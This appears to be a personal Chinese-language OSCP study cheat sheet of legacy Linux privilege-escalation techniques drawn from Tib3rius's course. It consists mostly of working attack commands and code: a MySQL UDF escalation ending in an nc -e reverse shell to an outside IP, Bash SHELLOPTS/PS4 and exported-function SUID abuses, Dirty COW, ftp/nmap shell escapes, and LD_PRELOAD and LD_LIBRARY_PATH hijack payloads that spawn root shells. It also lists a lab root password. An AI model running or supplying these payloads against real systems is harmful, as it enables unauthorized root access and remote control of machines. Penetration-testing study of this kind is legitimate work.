3-古老linux提权手法 - My-oscp-all-things

提权手法来自Tib3rius课程,oscp考试中基本不会用到不过学此技术也甚是有趣。 [Tib3rius-linux privilege | Udemy](https://www.udemy.com/course/linux-privilege-escalation/learn/lecture/16964494?start=0#overview) [Pentest-Cheatsheets/privilege-escalation at master · Tib3rius/Pentest-Cheatsheets · GitHub](https://github.com/Tib3rius/Pentest-Cheatsheets/tree/master/privilege-escalation) ### udf to root ``` udf https://www.exploit-db.com/exploits/1518 gcc -g -c raptor_udf2.c -o udf_privilege -fPIC ->x64 不过不用太过关心这个。 ``` <a name="N6dwl"></a> ### strings suggest ``` strings file strace -v -f -e execve <command> 2>&1 | grep exec ltrace command ``` <a name="CB6Ob"></a> ### SUID / SGID - Abuse Shell Feature (Bash < 4.2-048) ``` 当bash version <4.2-048时可以定义一个function to privilege user@debian:~$ function /etc/rio { /bin/bash -p;} user@debian:~$ export -f /etc/rio 最后再启用调用了/etc/rio的服务即可 ``` <a name="u67rU"></a> ### SUID / SGID - Abuse Shell Features (Bash < 4.4) ``` env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2 /tmp/rootbash -p ``` <a name="oE767"></a> <a name="y4UVQ"></a> ### dirty cow ``` gooddirtycow->https://github.com/FireFart/dirtycow gcc -pthread dirtycow.c -o dirtycow -lcrypt ``` <a name="zhkmk"></a> ### udf2root ``` https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c use mysql; create table trenchesofit(line blob); insert into trenchesofit values(load_file('/var/www/html/lib_mysqludf_sys_64.so')); select * from trenchesofit into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so' create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; select sys_exec('nc -e /bin/sh 192.168.49.130 22'); ``` <a name="DaOJi"></a> ### user files find passwd 2 root ``` /home/user/myvpn.ovpn -> auth-user-pass /etc/openvpn/auth.txt ->root password123 ``` <a name="w4gLs"></a> ## sudo2root ``` sudo -l #查看suid find / -perm -u=s -type f 2>/dev/null ``` <a name="wXQ4k"></a> ### ftp ``` ftp -> ftp !sh ``` <a name="w5i8P"></a> ### nmap ``` echo 'os.execute("/bin/sh")' > a.nse nmap --script=a.nse ``` <a name="C3Btt"></a> <a name="qTtsX"></a> ## LD_PRELOAD ``` sudo -l ``` can find preload.c ``` #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setresuid(0,0,0); system("/bin/bash -p"); } ``` ``` Defaults env_reset sudoers -> Defaults env_keep+=LD_PRELOAD gcc -fPIC -shared -nostartfiles -o /tmp/a.so preload.c -> sudo LD_PRELOAD=/tmp/a.so find -> root ``` <a name="ah9DJ"></a> ### library_path ``` sudoers -> Defaults env_keep+=LD_LIBRARY_PATH ldd elf -> find ... gcc -fPIC -shared -o libcrypt.so.1 library.c sudo LD_LIBRARY_PATH=. apache2 #发现apache2使用了该库 ``` <a name="CrDll"></a> ### library.c ``` #include <stdio.h> #include <stdlib.h> static void hijack() __attribute__((constructor)); void hijack() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); system("/bin/bash -p"); } ```